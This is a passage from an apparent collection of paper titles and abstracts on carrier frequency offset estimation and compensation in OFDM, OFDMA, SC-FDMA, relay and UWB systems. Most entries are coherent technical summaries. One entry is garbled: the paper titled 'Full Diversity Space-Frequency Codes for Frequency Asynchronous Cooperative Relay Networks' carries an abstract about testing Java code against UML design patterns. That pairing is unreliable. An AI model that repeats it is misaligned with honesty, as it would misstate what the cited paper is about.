Imbalance in OFDM Systems paper_content: In this paper, we focus on improving the accuracy of frequency offset estimation for an orthogonal frequency-division multiplexing (OFDM) system under the conditions of the joint impairments in both carrier frequency offset (CFO) and in-phase/quadrature (I/Q) imbalance. To propose a robust CFO estimation scheme and to benchmark its performance, the performance of the conventional frequency estimation algorithm in the presence of I/Q imbalance is analyzed, and some modifications to the conventional estimation scheme are highlighted. We show via simulations that such a design achieves a remarkable robustness against I/Q imbalance; thereby, the proposed scheme can efficiently estimate the CFO, irrespective of the I/Q mismatch. --- paper_title: Mixture Kalman filtering for joint carrier recovery and channel estimation in time-selective Rayleigh fading channels paper_content: This paper proposes a new blind algorithm, based on Mixture Kalman Filtering (MKF), for joint carrier recovery and channel estimation in time-selective Rayleigh fading channels. MKF is a powerful tool for estimating unknown parameters in non-linear, non-Gaussian, real-time applications. We use a combination of Kalman filtering and Sequential Monte Carlo Sampling to estimate the channel fading coefficients and joint posterior probability density of the unknown carrier offset and transmitted data respectively. We study the effect of Signal to Noise Ratio (SNR) and doppler shift on Mean Square Error (MSE) and Bit Error Rate (BER) performance of the proposed algorithm through computer simulations. The results show that BER of the proposed algorithm achieves the theoretical performance slope for the full acquisition range of normalized carrier frequency offset. --- paper_title: Analysis and suppression of effects of CFO and phase noise in WFMT modulation for vehicular communications paper_content: We investigate the WFMT (wavelet filtered multitone) modulation scheme for vehicular system and describe the effect of the carrier frequency offset and phase noise on the performance of this scheme. WFMT modulation scheme is based on the wavelet theory and complex filter banks for synthesis and analysis of multi-channel signal. WFMT modulation scheme keeps on the advantage of filter banks system and decreases the system complexity and can be easily possible for the implementation of filter banks. In this paper, we compare ISI (inter symbol interference) and ICI distortions of the WFMT and vehicular OFDM system due to the CFO (carrier frequency offset) and phase noise. And we analyze the PAPR performance of these systems and show the BER performance curve in the HPA and ICI situation owing to the Doppler frequency shift and the frequency offset. Also, the performance of WFMT system versus vehicular OFDM is calculated to find the SNR degradation on DMT (discrete multitone)/OFDM and WFMT system with number of FFT points in the presence of ICI, ISI, phase noise, PAPR and Doppler Effect. In the simulation results, the PAPR performance of WFMT system becomes worse because of characteristic of wavelet component coefficients. --- paper_title: Joint sector identity and integer part of carrier frequency offset detection by phase-difference in long term evolution cell search process paper_content: In the Long Term Evolution (LTE) system, the initial cell search needs not only to achieve the timing synchronisations of symbols, slots and frames, but also to detect the sector identity (ID), the cell ID group and the carrier frequency offset (CFO), which includes an integer part (ICFO) and a fractional part. To accomplish this cell search process, two synchronisation signals, the primary synchronisation signal (PSS) and the secondary synchronisation signal, are periodically broadcasted from base stations in the LTE system. The PSS is mainly used for sector ID detection. In this study, an innovative algorithm for detecting the sector ID and ICFO together via the PSS-matching process is presented. In the proposed scheme, the phases of the differential correlation instead of the absolute values are adopted to determine the ICFO. Furthermore, a new set of PSS is proposed in order to improve the success probability of ICFO detection. Compared with conventional schemes, the proposed scheme can detect both the sector ID and ICFO with higher accuracy and much lower complexity. --- paper_title: Estimation of residual carrier and sampling frequency offsets in OFDM-SDMA uplink transmissions paper_content: This paper investigates the estimation of multiple residual carrier frequency offsets (RCFOs) and sampling frequency offsets (SFOs) in the uplink of a multiuser OFDM network with space division multiple access (SDMA). The proposed solutions are based on the presence of some dedicated pilot tones within the signal spectrum, which are traditionally employed in OFDM systems to track channel variations and residual frequency errors. The main obstacle is the large number of parameters involved in the estimation process, which makes the uplink synchronization a rather challenging task. A practical solution to this problem relies on the separation of the received signals before the estimation procedure is started. This way, the RCFOs and SFOs of different users are estimated independently with affordable complexity. We propose two alternative approaches for users' separation. The former is based on the use of orthogonal pilot sequences, while the latter exploits the distinct spatial signatures of the uplink signals. Computer simulations and theoretical analysis are employed to assess the performance of the proposed schemes and to make comparison with existing alternatives. --- paper_title: Uplink single-carrier frequency division multiple access system with joint equalisation and carrier frequency offsets compensation paper_content: Similar to the orthogonal frequency division multiple access (OFDMA) system, the single-carrier frequency division multiple access (SC-FDMA) system also suffers from frequency mismatches between the transmitter and the receiver. As a result, in this system, the carrier frequency offsets (CFOs) disrupt the orthogonality between subcarriers and give rise to inter-carrier interference (ICI) and multiple access interference (MAI) among users. The authors present a new minimum mean square error (MMSE) equaliser, which jointly performs equalisation and carrier frequency offsets (CFOs) compensation. The mathematical expression of this equaliser has been derived taking into account the MAI and the channel noise. A low complexity implementation of the proposed equalisation scheme using a banded matrix approximation is presented here. From the obtained simulation results, the proposed equalisation scheme is able to enhance the performance of the SC-FDMA system, even in the presence of estimation errors. --- paper_title: Hybrid time/frequency domain compensator for RF impairments in OFDM systems paper_content: I/Q signal processing based communication systems suffer from analog front-end (FE) imperfections such as in-phase and quadrature-phase (I/Q) imbalance and carrier frequency offset (CFO). These impairments are commonly encountered in all practical implementations, and severely degrade the obtainable link performance. Moreover, orthogonal frequency division multiplexing (OFDM)-based systems are particularly sensitive to radio frequency (RF) impairments. In this paper, we analyze the impact of transmitter and receiver I/Q imbalance together with channel distortion and CFO error on an ideal transmit signal, and propose low-complexity DSP algorithms and compensation structure for coping with such imperfections. Based on our proposed estimation/compensation structure, we are able to decouple the impairments and process them individually with rather low-complexity. More specifically, we first apply a blind algorithm for receiver I/Q imbalance compensation, followed by an efficient time domain CFO estimator and compensator. The transmitter I/Q imbalance and channel are then equalized jointly, in the frequency domain, with maximum-likelihood (ML) or zero-forcing (ZF) schemes, respectively. The applied algorithms are either blind working without aid of any training symbol or use only one OFDM symbol for impairments estimation, providing an efficient alternative solution with reduced complexity. The computer simulation results indicate a close to ideal performance of ZF scheme, and suggest that additional performance improvement due to frequency diversity can be obtained when ML estimation technique is employed. --- paper_title: BER Analysis of Uplink OFDMA in the Presence of Carrier Frequency and Timing Offsets on Rician Fading Channels paper_content: In orthogonal frequency-division multiple access (OFDMA) on the uplink, the carrier frequency offsets (CFOs) and/or timing offsets (TOs) of other users with respect to a desired user can cause multiuser interference (MUI). Analytically evaluating the effect of these CFO/TO-induced MUI on the bit error rate (BER) performance is of interest. In this paper, we analyze the BER performance of uplink OFDMA in the presence of CFOs and TOs on Rician fading channels. A multicluster multipath channel model that is typical in indoor/ultrawideband and underwater acoustic channels is considered. Analytical BER expressions that quantify the degradation in BER due to the combined effect of both CFOs and TOs in uplink OFDMA with M-state quadrature amplitude modulation (QAM) are derived. Analytical and simulation BER results are shown to match very well. The derived BER expressions are shown to accurately quantify the performance degradation due to nonzero CFOs and TOs, which can serve as a useful tool in OFDMA system design. --- paper_title: On Frequency Offset Estimation for OFDM paper_content: This paper presents a comparative study of Schmidl-Cox (SC) and Morelli-Mengali (MM) algorithms for frequency offset estimation in OFDM, along with a new least squares (LS) and a new modified SC algorithm. All algorithms have comparable accuracy approaching asymptotically the Cramer-Rao bound. The complexity of the LS algorithm is between O(N) and O(N log N) operations, where N is the length of the training sequence, while the complexity of the SC algorithm is between O(N log N) and O(N2) operations, and the complexity of the MM algorithm is O(N2) operations. The modified version of the SC algorithm requires only one training sequence as opposed to two required by the original SC algorithm, and significantly reduced O(N log N) complexity. The sensitivity of the three algorithms to quantization of the arg function (the argument of a complex number) is analyzed and quantified. The analysis and simulation results demonstrate that while all considered algorithms can be used with coarse quantization of the arg function, the LS algorithm is least affected and the SC algorithm is most affected by this quantization error. --- paper_title: Iterative frequency-domain fractionally spaced receiver for zero-padded multi-carrier code division multiple access systems paper_content: In this study, the authors propose an improved frequency-domain fractionally spaced (FDFS) minimum mean square error (MMSE) receiver for zero-padded multi-carrier code division multiple access (MC-CDMA) systems when the guard interval is not enough to avoid the inter-symbol interference (ISI) caused by the multipath channel. The proposed novel iterative FDFS-based receivers firstly reconstruct the received symbol to reduce the ISI and then followed by the FDFS-based equalisers to minimise the effect of ISI and inter-carrier interference (ICI) caused by carrier frequency offset (CFO) and Doppler shifts. A few iterations are performed to achieve the expected bit error rate (BER) performance. To reduce the receiver complexity, the novel simplified diagonal FDFS-based receivers with a fixed noise variance are developed with slight performance degradation. The proposed iterative receivers have never been studied in the existing literature. Simulation results show that the proposed iterative FDFS-based receivers can significantly improve the BER performance of the conventional FDFS-MMSE receiver in severe multiple interferences environments caused by multipath, CFO and Doppler shift. --- paper_title: An Adaptive Receiver Design for OFDM-Based Cooperative Relay Systems Using Conjugate Transmission paper_content: Cooperative relay systems have attracted much attention in wireless communications in recent years due to its various potentials in the enhancement of diversity, achievable rates and coverage range. By using spatially distributed relays capable of forwarding data through statistically independent links, cooperative relaying can fulfill conventional multiple-input multiple-output (MIMO) transmission in a more feasible way. It is more appealing to wireless high rate multimedia application to employ orthogonal frequency division multiplexing (OFDM) in cooperative relay systems, since OFDM has desirable properties for wireless transmission such as high bandwidth efficiency and resistance to the multipath delay spread. However, the performance of OFDM-based cooperative relay systems is still sensitive to the intercarrier interference (ICI) induced by the frequency offset. The ICI problem becomes more complicated since the signals forwarded by relays would suffer from statistically independent channel fadings and frequency offsets, which has rarely been dealt with in conventional ICI cancellation schemes. Therefore, the thesis first focuses on some existing ICI cancellation schemes based on the two-path conjugate transmission, including conjugate cancellation (CC), phase rotated conjugate cancellation (PRCC), and the adaptive receivers, which provide remarkable performances for OFDM systems not using relays. We point out the performance deficiency of the receiver designs in the above schemes when conjugate transmission is carried out in the two-relay cooperation scenario. Then, we develop an adaptive receiver that is suitable for OFDM-based cooperative relay systems based on conjugate transmission. In the proposed scheme, not only the phase rotations are applied, but also the amplitudes are adjusted on the two receiving paths. We provide theoretical derivation for the optimal values of both the phase rotations and the amplitude scale using criteria of maximizing the carrier-to-interference ratio and minimizing the ICI power, respectively. We also develop an adaptive process for updating the phase rotations and the amplitude scale using the normalized block least mean-squared (BLMS) algorithm to track channel and frequency offset variation under time-varying environments. Simulation results show that the proposed adaptive receiver is better than other related works for OFDM-based cooperative relaying systems. It is also demonstrated that the proposed scheme is robust against limited channel estimation errors --- paper_title: Wireless Visions: A Look to the Future by the Fellows of the WWRF paper_content: In less than two decades, mobile communication has developed from a niche application to a mass-market high-tech product, having experienced an unprecedented growth, never achieved by any other technology, whether radio, television, or even the Internet. Thirteen well-known experts, all of them honored as WWRF Fellows, have been interviewed and shared their expertise and opinions on ten questions about the wireless future, as presented here. The answers span a wide field from air interfaces, networks, devices, applications, to new ways of interaction, to name a few. Although the ideas and views presented here are not one common vision, they should provide stimulating ideas and questions for future research, and it will be exciting to see how things are really going to develop. The Fellows' ideas also clearly show the fascination, impact, and opportunities wireless communications has and will have in the future. --- paper_title: An average Cramer-Rao bound for frequency offset estimation in frequency-selective fading channels paper_content: Several variations of Cramer-Rao bounds for carrier frequency offset (CFO) estimation in frequency-selective fading channels have been used to benchmark practical estimators' performance or to design training signals for CFO estimation. Among them, the extended Miller-Chang bound (EMCB) provides a tighter bound than the CRB for locally unbiased estimators. However, there is no closed-form expression of the EMCB for the CFO estimation in frequency-selective fading channels with an arbitrary training signal. In this letter, we derive a closed-form exact average CRB (the EMCB) valid for any training signal and any signal structure for the CFO estimation over frequency-selective Rayleigh fading channels with uncorrelated or arbitrarily correlated taps. The accuracy and generality of the proposed average CRB expression, and its advantages over the existing expressions are corroborated by numerical and simulation results. --- paper_title: A Comment on “A Blind OFDM Synchronization Algorithm Based on Cyclic Correlation” paper_content: This comment points out several errors in the above letter. The correct frequency offset estimator is then proposed. Monte Carlo simulation results validate our analytical observations. --- paper_title: Full Diversity Space-Frequency Codes for Frequency Asynchronous Cooperative Relay Networks with Linear Receivers paper_content: In a previous work, we presented a technique that allows verifying the conformance between Java implementations and UML class diagrams, using design tests. While it allowed verifying conformance it does so in a sense that does not deal adequately with some design patterns. In such scenarios, there are semantic constraints among the involved elements that UML does not allow our technique to recognize them. Therefore, if one evolves the implementation violating the design pattern, the generated design tests will no longer be capable of detecting the design violation. To address this problem, we propose in this paper an approach based on: (1) UML profiles to explicitly tag UML incorporating design patterns; and (2) a set of design test templates able to recognize the appropriate implementation of these design patterns on Java code. We also present a prototype capable of automatically generating the design tests to verify the design patterns explicated by the UML profile. --- paper_title: Adaptive Frequency-Domain RLS DFE for Uplink MIMO SC-FDMA paper_content: It is well known that, in the case of highly frequency-selective fading channels, the linear equalizer (LE) can suffer significant performance degradation compared with the decision feedback equalizer (DFE). In this paper, we develop a low-complexity adaptive frequency-domain DFE (AFD-DFE) for single-carrier frequency-division multiple-access (SC-FDMA) systems, where both the feedforward and feedback filters operate in the frequency domain and are adapted using the well-known block recursive least squares (RLS) algorithm. Since this DFE operates entirely in the frequency domain, the complexity of the block RLS algorithm can be substantially reduced when compared with its time-domain counterpart by exploiting a matrix structure in the frequency domain. Furthermore, we extend our formulation to multiple-input–multiple-output (MIMO) SC-FDMA systems, where we show that the AFD-DFE enjoys a significant reduction in computational complexity when compared with the frequency-domain nonadaptive DFE. Finally, extensive simulations are carried out to demonstrate the robustness of our proposed AFD-DFE to high Doppler and carrier frequency offset (CFO). --- paper_title: Single-Carrier Systems With MMSE Linear Equalizers: Performance Degradation due to Channel and CFO Estimation Errors paper_content: We assess the impact of the channel and carrier frequency offset (CFO) estimation errors on the performance of single-carrier systems with MMSE linear equalizers. Performance degradation is caused by the fact that a mismatched MMSE linear equalizer is applied to channel output samples with imperfectly canceled CFO. We develop asymptotic expressions for the excess mean square error (EMSE) induced by the channel and CFO estimation errors. Under some realistic assumptions, we derive a simple EMSE approximation which reveals that performance degradation is mainly caused by the imperfectly canceled CFO. Furthermore, the EMSE is approximately proportional to the CFO estimation error variance, with the proportionality factor being independent of the training sequence. Thus, optimal training sequence (TS) design for CFO estimation is also highly relevant for joint channel and CFO estimation. --- paper_title: Joint Bit and Power Loading Algorithm for OFDM Systems in the Presence of ICI paper_content: It is well known that orthogonal frequency division multiplexing (OFDM) is robust to frequency-selective fading in wireless channels. However, it is sensitive to carrier frequency offset (CFO) which results in inter-carrier interference (ICI) and then degrades the transmission performance significantly. In this paper, a resource allocation scheme for OFDM systems in the presence of ICI is proposed. The aim of the proposed scheme is to maximize the system throughput under a total transmission power constraint. By allocating the resource appropriately, the effect of ICI can be reduced without any ICI cancellation scheme at the receiver, resulting in the increase of system throughput. Numerical results show that the proposed scheme has better throughput as compared to the adaptive subcarrier bandwidth method with equal power allocation or power allocation method with conventional water-filling algorithm. --- paper_title: Blind Maximum Likelihood Carrier Frequency Offset Estimation for OFDM With Multi-Antenna Receiver paper_content: In this paper, based on the maximum likelihood (ML) criterion, we propose a blind carrier frequency offset (CFO) estimation method for orthogonal frequency division multiplexing (OFDM) with multi-antenna receiver. We find that the blind ML solution in this situation is quite different from the case of single antenna receiver. As compared to the conventional MUSIC-like CFO searching algorithm, our proposed method not only has the advantage of being applicable to fully loaded systems, but also can achieve much better performance in the presence of null subcarriers. It is demonstrated that the proposed method also outperforms several existing estimators designed for multi-antenna receivers. The theoretical performance analysis and numerical results are provided, both of which demonstrate that the proposed method can achieve the Cramer-Rao bound (CRB) under the high signal-to-noise ratio (SNR) region. --- paper_title: Joint Carrier Frequency Offset and Direction of Arrival Estimation via Hierarchical ESPRIT for Interleaved OFDMA/SDMA Uplink Systems paper_content: In this paper, we propose an efficient algorithm to jointly estimate the directions of arrival (DOAs) and carrier frequency offsets (CFOs) in interleaved orthogonal frequency division multiple access / space division multiple access (OFDMA/SDMA) uplink networks. The algorithm makes use of the signal structure by estimating the CFOs and DOAs in a hierarchical tree structure, in which two CFO estimations and one DOA estimation are employed alternatively. One special feature in the proposed algorithm is that the algorithm proceeds in a coarse-fine manner with temporal filtering or spatial beamforming being invoked between the parameter estimations to decompose the signals progressively into subgroups so as to enhance the estimation accuracy and lower the computational overhead. Simulations show that the proposed algorithm can provide satisfactory performance with increased channel capacity. --- paper_title: A Novel Code-Aided Carrier Recovery Algorithm for Coded Systems paper_content: We present a novel code-aided carrier recovery method for low-density parity-check (LDPC) coded systems, which comprises two supporting algorithms: 1) a coarse synchronization by maximizing a cost function, the mean absolute value of the soft outputs of the LDPC decoder, followed by a simple interpolation operation to improve the estimation accuracy and 2) a fine synchronization based on the soft decisions produced by the LDPC decoder. With moderate computational complexity, this proposed algorithm is designed to synchronize signals with large carrier frequency offset and phase offset at low signal-to-noise ratio (SNR). When applied to the case of an 8-PSK system with (1944,972) LDPC code, the performance loss compared to the case of ideal synchronization is negligible. --- paper_title: Effective Adaptive Iteration Algorithm for Frequency Tracking and Channel Estimation in OFDM Systems paper_content: For joint maximum-likelihood (ML) frequency tracking and channel estimation using orthogonal frequency-division multiplexing (OFDM) training blocks in OFDM communications over mobile wireless channels, a major difficulty is the local extrema or multiple-solution complication arising from the multidimensional log-likelihood function. To overcome this, we first obtain crude ML frequency-offset estimators using single-time-slot samples from the received time-domain OFDM block. These crude frequency estimators are shown to have unique closed-form solutions. We then optimally combine these crude frequency estimators in the linear-minimum-mean-square-error (LMMSE) sense for a more accurate solution. Finally, by alternatively updating the LMMSE frequency estimator and the ML channel estimator through adaptive iterations, we successfully avoid the use of a multidimensional log-likelihood function, hence obviating the complex task of global solution search and, meanwhile, achieve good estimation performance. Our estimators have mean square errors (MSEs) tightly close to Cramer-Rao bounds (CRBs) with a wide tracking range. --- paper_title: MMSE-Based CFO Compensation for Uplink OFDMA Systems with Conjugate Gradient paper_content: In this paper, we present a low-complexity carrier frequency offset (CFO) compensation algorithm based on the minimum mean square error (MMSE) criterion for uplink orthogonal frequency division multiple access systems. CFO compensation with an MMSE filter generally requires an inverse operation on an interference matrix whose size equals the number of subcarriers. Thus, the computational complexity becomes prohibitively high when the number of subcarriers is large. To reduce the complexity, we employ the conjugate gradient (CG) method which iteratively finds the MMSE solution without the inverse operation. To demonstrate the efficacy of the CG method for our problem, we analyze the interference matrix and present several observations which provide insight on the iteration number required for convergence. The analysis indicates that for an interleaved carrier assignment scheme, the maximum iteration number for computing an exact solution is at most the same as the number of users. Moreover, for a general carrier assignment scheme, we show that the CG method can find a solution with far fewer iterations than the number of subcarriers. In addition, we propose a preconditioning technique which speeds up the convergence of the CG method at the expense of slightly increased complexity for each iteration. As a result, we show that the CFO can be compensated with substantially reduced computational complexity by applying the CG method. --- paper_title: Blind iterative frequency offset estimator for orthogonal frequency division multiplexing systems paper_content: This study presents an iterative carrier frequency offset estimator for orthogonal frequency division multiplexing (OFDM) systems. The proposed estimator is based on the efficient Viterbi-and-Viterbi (VAV) algorithm. The proposed estimator is blind and can be used with non-constant modulus subcarrier modulations such as quadrature amplitude modulation (QAM). The performance of the proposed estimator is assessed theoretically and via Monte Carlo simulations over various channel models and compared to the performance of other well established blind techniques in addition to the Cramer–Rao lower bound. The comparison results demonstrate that the proposed estimator outperforms other well-established blind estimators by more than 12 dB at moderate and high signal-to-noise ratios (SNRs). --- paper_title: Channel Estimation and Equalization for Asynchronous Single Frequency Networks paper_content: Single carrier frequency-domain equalization (SC-FDE) modulations are known to be suitable for broadband wireless communications due to their robustness against severe time-dispersion effects and the relatively low envelope fluctuations of the transmitted signals. In this paper, we consider the use of SC-FDE schemes in broadcasting systems. A single frequency network transmission is assumed, and we study the impact of distinct carrier frequency offset (CFO) between the local oscillator at each transmitter and the local oscillator at the receiver. We propose an efficient method for estimating the channel frequency response and CFO associated to each transmitter and propose receiver structures able to compensate the equivalent channel variations due to different CFO for different transmitters. Our performance results show that we can have excellent performance, even when transmitters have substantially different frequency offsets. --- paper_title: Joint channel, phase noise, and carrier frequency offset estimation in cooperative OFDM systems paper_content: Cooperative communication systems employ cooperation among nodes in a wireless network to increase data throughput and robustness to signal fading. However, such advantages are only possible if there exist perfect synchronization among all nodes. Impairments like channel multipath, time varying phase noise (PHN) and carrier frequency offset (CFO) result in the loss of synchronization and diversity performance of cooperative communication systems. Joint estimation of these multiple impairments is necessary in order to correctly decode the received signal in cooperative systems. In this paper, we propose an iterative pilot-aided algorithm based on expectation conditional maximization (ECM) for joint estimation of multipath channels, Wiener PHNs, and CFOs in amplify-and-forward (AF) based cooperative orthogonal frequency division multiplexing (OFDM) system. Numerical results show that the proposed estimator achieves mean square error performance close to the derived hybrid Cramer-Rao lower bound (HCRB) for different PHN variances. --- paper_title: Progressive Frequency-Offset Compensation in Turbo Receivers paper_content: Based on the recently-proposed iterative receiver by Colavolpe et al., we extend it to further incorporate the mechanism of frequency-offset compensation. As a progressive approach, the factor graph of a long frame is first divided into numerous subgraphs of short block, iterative decoding can successfully start its work as the effect of frequency-offset can be well mitigated due to the small size of subgraph. As the iteration goes on, the extrinsic information from decoder can be employed to get finer estimate of the frequency-offset. The system performance can be steadily improved as the block size is progressively expanded to the final frame size. --- paper_title: Joint Semi-Blind Channel Estimation and Synchronization in Two-Way Relay Networks paper_content: In this paper, we propose a synchronization and channel estimation method for amplify-and-forward two-way relay networks (AF-TWRNs) based on a low-complexity maximum-likelihood (LCML) algorithm and a joint synchronization and channel estimation (JSCE) algorithm. For synchronous AF-TWRNs, the LCML algorithm blindly estimates general nonreciprocal flat-fading channels. We formulate the channel estimation as a convex optimization problem and obtain a closed-form channel estimator. Based on the mean square error (MSE) analysis of the LCML algorithm, we propose a generalized LCML (GLCML) algorithm to perform channel estimation in the presence of the timing offset. Based on the approximation of the LCML algorithm, the JSCE algorithm is proposed to estimate jointly the timing offset and channel parameters. The theoretical analysis shows that the closed-form LCML channel estimator is consistent and unbiased. The analytical MSE expression shows that the estimation error approaches zero in scenarios with either a high signal-to-noise ratio (SNR) or a large frame length. Monte Carlo simulations are employed to verify the theoretical MSE analysis of the LCML algorithm. In the absence of perfect timing synchronization, the GLCML algorithm selects an estimation sample, which produces the optimal channel estimation, according to the MSE analysis. Simulation results also demonstrate that the JSCE algorithm is able to achieve accurate timing offset estimation. --- paper_title: Multi-tone CDMA design for arbitrary frequency offsets using orthogonal code multiplexing at the transmitter and a tunable receiver paper_content: The authors propose a new multi-tone (MT) code division multiple access (CDMA) design which has a superior bit error rate (BER) performance than conventional MT CDMA in the presence of frequency offset. The design involves multiplexing of Walsh codes onto the sub-carriers in conjunction with double differential modulation. To exploit the full potential of the design a partial correlation receiver has been proposed. Depending on the signal-to-noise ratio (SNR) and frequency offset it is possible to tune this receiver for the best possible performance. The simulated BER performance of the proposed system has been found to be better than MT CDMA for small as well as large frequency offsets for both single and multi-user systems in additive white Gaussian noise (AWGN) and Rayleigh fading channels. --- paper_title: Combined MMSE-FDE and Interference Cancellation for Uplink SC-FDMA with Carrier Frequency Offsets paper_content: Due to its lower peak-to-average power ratio (PAPR) compared with orthogonal frequency division multiple access (OFDMA), single carrier frequency division multiple access (SC-FDMA) has been recently accepted as the uplink multiple access scheme in the Long Term Evolution (LTE) of cellular systems by the Third Generation Partnership Project (3GPP). However, similar to OFDMA, carrier frequency offset (CFO) can destroy the orthogonality among subcarriers and degrade the performance of SC-FDMA. To mitigate the effect of CFOs, we propose a combined minimum mean square error frequencydomain equalization (MMSE-FDE) and interference cancellation scheme. In this scheme, joint FDE with CFO compensation (JFC) is utilized to obtain the initial estimation for each user. In contrast to previous schemes, where the FDE and CFO compensation are done separately, in JFC, the MMSE FDE is designed to suppress the MUI after CFO compensation. To further eliminate the MUI, we combine JFC with parallel interference cancellation (PIC). In particular, we iteratively design the MMSE FDE equalizer to suppress the remaining MUI at each stage and obtain better estimation. Simulation results show that the proposed scheme can significantly improve the system performance. --- paper_title: Maximum Likelihood Frequency Offset Estimation in Multiple Access Time-Hopping UWB paper_content: Frequency offset estimation for time-hopping (TH) ultra-wide-band (UWB) is addressed in the literature by relying on an AWGN assumption and by exploiting a periodic preamble appended to each packet. In this paper we generalize these techniques with two aims. First, we identify a solution which does not rely on any periodic structure, but can be implemented with a generic TH format. Second, we identify a solution which is robust to multiple access interference (MAI) by assuming a Gaussian mixture (GM) model for MAI. In fact, GMs have recently been identified as good descriptors of UWB interference, and they provide closed form and limited complexity results. With these ideas in mind, we build a data aided maximum likelihood (ML) estimator. The proposed ML solution shows quasi optimum performance in the Cramer-Rao bound sense, and proves to be robust in meaningful multiple user scenarios. --- paper_title: Accurate Two-Stage Frequency Offset Estimation for Coherent Optical Systems paper_content: We present a two-stage feedforward frequency offset estimation (FOE) algorithm on the basis of the phase-difference method. The first stage of the proposed FOE generates a rough FOE through averaging the phase difference between two adjacent symbols and compensates the signals. The second stage of the FOE estimates the residual FO through averaging the phase difference of two symbols with distance L , which provides a significantly larger noise-tolerance and thus improves system performance. The proposed FOE can be applied to both quadrature phase-shift keying and 16-quadrature amplitude modulation systems. Simulations show that the mean square error of the proposed FOE can be reduced through an order of two in magnitude under small laser linewidth situation compared with the classic phase-difference-based FOE. The experimental result shows that the proposed FOE gives 0.6-dB optical-signal-to-noise-ratio improvement against the classic FOE, which validates its usefulness. --- paper_title: Blind Carrier Frequency Offset Estimation for Interleaved OFDMA Uplink paper_content: In this paper, we develop two novel blind carrier frequency offset (CFO) estimators for interleaved orthogonal frequency division multiple access (OFDMA) uplink transmission in a multiantenna system. The first estimator is the subspace-based one and could blindly estimate multiple CFOs from a rank reduction approach. The second estimator is based on the maximum likelihood (ML) approach and improves the performance as compared to the first one. The higher computational complexity of the ML estimator is alleviated by the alternating projection (AP) method. Both the proposed estimators support fully loaded data transmissions, i.e., all subcarriers being occupied, which provides higher bandwidth efficiency as compared to the existing schemes. The numerical results are then provided to corroborate the proposed studies. --- paper_title: Practical Timing and Frequency Synchronization for OFDM-Based Cooperative Systems paper_content: In this paper, we investigate the timing and carrier frequency offset (CFO) synchronization problem in decode and forward cooperative systems operating over frequency selective channels. A training sequence which consists of one orthogonal frequency-division multiplexing (OFDM) block having a tile structure in the frequency domain is proposed to perform synchronization. Timing offsets are estimated using correlation-type algorithms. By inserting some null subcarriers in the proposed tile structure, we propose a computationally efficient subspace decomposition-based algorithm for CFO estimation. The issue of optimal tile length is studied both theoretically and through simulations. By judiciously designing the tile size of the pilot, the proposed algorithms are shown to have better performance, in terms of synchronization errors and bit error rate, than the time-division multiplexing-based training method and the computationally demanding space-alternating generalized expectation-maximization algorithm. --- paper_title: A Low-Complexity ML Estimator for Carrier and Sampling Frequency Offsets in OFDM Systems paper_content: This letter considers the joint acquisition of the carrier frequency offset (CFO) and sampling frequency offset (SFO) in OFDM systems using two long training symbols in the preamble. Conventional maximum-likelihood (ML) methods require a two-dimensional exhaustive search. To overcome this problem, a low-complexity closed-form ML estimator is proposed. It is shown that the CFO can be solved in closed-form. Then we develop an approximate ML estimation algorithm for the SFO by taking the second-order Taylor series expansion. Simulation results show that the proposed algorithm achieves almost the same performance as existing ML methods, but no exhaustive search is needed. --- paper_title: Low complexity LS and MMSE based CFO compensation techniques for the uplink of OFDMA systems paper_content: Orthogonal frequency division multiple access (OFDMA), where different subcarriers are allocated to different users, has been adopted for the uplink of several standards and has attracted a great deal of attention as a result. However, OFDMA is highly sensitive to carrier frequency offset (CFO) between the transmitter and receiver. In the uplink, different carrier frequency offsets due to different users can adversely affect subcarrier orthogonality. We propose a low complexity CFO compensation approach that addresses this problem while maintaining optimal performance. This approach is based on the least squares and minimum mean square error criteria applicable to interleaved and block interleaved carrier assignment schemes. The proposed algorithms use the special block circulant property of the interference matrix. In contrast to existing CFO compensation techniques, our algorithms do not rely on iterations or approximations. We present our approach in this paper and describe how a considerable reduction in computational complexity can be achieved by adopting it. --- paper_title: A Time Domain Inverse Matrix Receiver for CFO Suppression in WIMAX Uplink System paper_content: In orthogonal frequency division multiple access (OFDMA) uplink system, orthogonal multiple subcarriers are assigned to different users for parallel high data rate communications. However, carrier frequency offset (CFO), which is mainly due to oscillator mismatches and/or Doppler shift, will destroy the orthogonality among subcarriers and introduce intercarrier interference (ICI) as well as multiple-access interference (MAI) in uplink scenario. Thus, system performance will be seriously degraded. To overcome this problem, it is of great importance to do research on suppression of the interferences caused by CFO. In this paper, we proposed a novel time domain inverse matrix receiver to suppress the interference of multiple CFOs. Compared with the conventional frequency domain direct ZF inverse matrix method, which has high complexity in obtaining the ICI matrix and its inverse matrix, the proposed method has very low complexity in obtaining the interference matrix. Furthermore, the signal after interference suppression is a frequency domain signal. Thus the receiver complexity can be simplified. Simulation results show that this algorithm has almost the same performance to the frequency domain direct ZF inverse matrix method. --- paper_title: Energy efficient M2M signaling with enhanced gateway: Detection and offset compensation paper_content: Machine to machine (M2M) communication networks are designed to enable communications between an ultra low-power, low-cost wireless sensor motes and the unconstrained access network. Given such asymmetric constraints in the M2M communications, effective techniques should aim to minimize the overall energy consumed in the sensor mote. We consider an M2M network with an enhanced sensor gateway (ESG), where the ESG is designed to compensate for limitations at the sensor mote. We consider energy efficient transmission at the mote, and propose spreading codes as well as a low-complexity detector at the ESG. Subsequently, we specify the frequency offset problem at the sensor mote and propose algorithms to compensate for frequency offset at ESG. We observe that the proposed detection and offset compensation scheme can perform 0.6 dB worse than the optimal detector without frequency offset. --- paper_title: Combined PA/NPA CFO Recovery for FBMC Transmissions over Doubly-Selective Fading Channels paper_content: This paper deals with carrier frequency offset recovery for burst-mode filter-bank multicarrier transmission over channels affected by severe time-frequency selective fading. Unlike previously proposed algorithms, whereby frequency is recovered either relying on known pilot symbols multiplexed with the data stream (pilot-aided, or PA, approach), or exploiting specific properties of the multicarrier signal structure in a non-pilot-aided (NPA) fashion, here we present and discuss an algorithm based on the maximum likelihood principle, which can be qualified as combined PA/NPA since it takes advantage both of pilot symbols and also indirectly of data symbols through knowledge and exploitation of their specific modulation format. The algorithm requires the availability of the statistical properties of channel fading up to second-order moments. It is shown that the above approach allows to improve on both estimation accuracy and frequency acquisition range of previously published schemes. --- paper_title: Hard decision directed frequency tracking for OFDM on frequency selective channel paper_content: This paper presents a decision directed frequency tracking scheme to improve the spectrum efficiency of Orthogonal Frequency Division Modulation (OFDM) transmission for frequency selective channels. OFDM divides a broadband channel into parallel narrowband subchannels with different channel characteristics. The subcarriers with lower attenuation are selected to do the decision directed based frequency tracking. A phase error detection method is needed to keep the hard decision working stable during tracking. The algorithm ensures that the carrier frequency offset could be solved from the detected phase error. The Mean Square Error (MSE) estimate and the loop 